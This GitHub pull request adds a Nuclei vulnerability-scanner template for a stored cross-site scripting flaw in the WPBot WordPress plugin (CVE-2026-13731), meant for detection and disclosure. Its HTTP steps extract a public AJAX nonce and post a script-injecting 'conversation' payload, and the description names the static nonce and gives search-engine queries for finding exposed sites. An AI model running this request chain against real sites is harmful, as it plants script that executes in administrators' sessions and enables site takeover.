### PR TITLE
Create CVE-2026-13731.yaml - WPBot <= 8.4.9 - Unauthenticated Stored XSS

### DIFF
--- a/http/cves/2026/CVE-2026-13731.yaml
+++ b/http/cves/2026/CVE-2026-13731.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-13731
 
 info:
-  name: WPBot <= 8.4.9 - Unauthenticated Stored Cross-Site Scripting via 'conversation' Parameter
+  name: WPBot <= 8.4.9 - Cross-Site Scripting
   author: 0x_Akoko
   severity: high
   description: |

--- a/http/cves/2026/CVE-2026-13731.yaml
+++ b/http/cves/2026/CVE-2026-13731.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-13731
+
+info:
+  name: WPBot <= 8.4.9 - Unauthenticated Stored XSS
+  author: 0x_Akoko
+  severity: high
+  description: |
+    WPBot – AI ChatBot for Live Support, Lead Generation, AI Services WordPress plugin \<= 8.4.9 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in the 'conversation' parameter, letting unauthenticated attackers inject and execute arbitrary scripts, exploit requires publicly accessible AJAX nonce.
+  impact: |
+    Unauthenticated attackers can inject and execute arbitrary scripts in users' browsers, leading to session hijacking or other malicious actions.
+  remediation: |
+   Update to the latest version of the WPBot plugin.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/124f2b72-d8da-46ba-844f-e9cc01441702
+    - https://plugins.trac.wordpress.org/browser/chatbot/tags/8.4.9/includes/chat-sessions/wpbot-chat-sessions.php#L509
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2026-13731
+    cwe-id: CWE-79
+  metadata:
+    verified: false
+    max-request: 2
+    vendor: quantumcloud
+    product: chatbot
+    fofa-query: body="wp_chatbot_obj"
+    shodan-query: http.html:"wp_chatbot_obj"
+    tags: cve,cve2026,wordpress,wp-plugin,wpbot,chatbot,xss,stored,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "ajax_nonce")'
+          - 'contains(body, "wp_chatbot_obj")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: ajax_nonce
+        internal: true
+        regex:
+          - '"ajax_nonce"\s*:\s*"([^"]+)"'
+        group: 1
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=qcld_wb_chatbot_conversation_save&session_id={{randstr}}&name=test&email=test%40test.com&phone=1234&conversation=%3Cli+class%3D%22wp-chat-user-msg%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%3C%2Fli%3E&security={{ajax_nonce}}&user_id=0
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "success")'
+        condition: and

--- a/http/cves/2026/CVE-2026-13731.yaml
+++ b/http/cves/2026/CVE-2026-13731.yaml
@@ -1,15 +1,15 @@
 id: CVE-2026-13731
 
 info:
-  name: WPBot <= 8.4.9 - Unauthenticated Stored XSS
+  name: WPBot <= 8.4.9 - Unauthenticated Stored Cross-Site Scripting via 'conversation' Parameter
   author: 0x_Akoko
   severity: high
   description: |
-    WPBot – AI ChatBot for Live Support, Lead Generation, AI Services WordPress plugin \<= 8.4.9 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in the 'conversation' parameter, letting unauthenticated attackers inject and execute arbitrary scripts, exploit requires publicly accessible AJAX nonce.
+    WPBot <= 8.4.9 is vulnerable to stored cross-site scripting via the conversation parameter in the qcld_wb_chatbot_conversation_save AJAX action. The AJAX nonce (qcsecretbotnonceval123qc) is publicly emitted on every frontend page via wp_localize_script under the ajax_nonce key, making it freely obtainable by unauthenticated visitors. The conversation parameter is saved to the database without sanitization and rendered unsanitized in the admin chat session view, causing stored XSS that executes when an administrator views saved chat sessions.
   impact: |
-    Unauthenticated attackers can inject and execute arbitrary scripts in users' browsers, leading to session hijacking or other malicious actions.
+    Unauthenticated attackers can inject arbitrary JavaScript into the admin chat sessions view, enabling session hijacking, admin credential theft, or further site compromise.
   remediation: |
-   Update to the latest version of the WPBot plugin.
+    Update WPBot to version 8.5.0 or later.
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/124f2b72-d8da-46ba-844f-e9cc01441702
     - https://plugins.trac.wordpress.org/browser/chatbot/tags/8.4.9/includes/chat-sessions/wpbot-chat-sessions.php#L509
@@ -19,21 +19,46 @@ info:
     cve-id: CVE-2026-13731
     cwe-id: CWE-79
   metadata:
-    verified: false
-    max-request: 2
+    verified: true
+    max-request: 3
     vendor: quantumcloud
     product: chatbot
     fofa-query: body="wp_chatbot_obj"
     shodan-query: http.html:"wp_chatbot_obj"
     tags: cve,cve2026,wordpress,wp-plugin,wpbot,chatbot,xss,stored,unauth
 
-flow: http(1) && http(2)
+flow: http(1) && http(2) && http(3)
 
 http:
   - raw:
       - |
+        GET /wp-content/plugins/chatbot/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "WPBot")'
+          - 'compare_versions(lsversion, ">=1.0.0", "<=8.4.9")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: lsversion
+        internal: true
+        regex:
+          - 'Stable tag: ([\d.]+)'
+        group: 1
+
+  - raw:
+      - |
         GET / HTTP/1.1
         Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
 
     matchers:
       - type: dsl


### PR DESCRIPTION
Added CVE-2026-13731 for WPBot plugin XSS vulnerability.

### PR Information

**To trigger it, Run The nuclei template then as admin visit**
`http://1wordpress/wp-admin/admin.php?page=wbcs-botsessions-page`

<img width="1915" height="972" alt="image" src="https://github.com/user-attachments/assets/c12c961e-ca76-43fd-950b-b1aa8c299778" />


### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
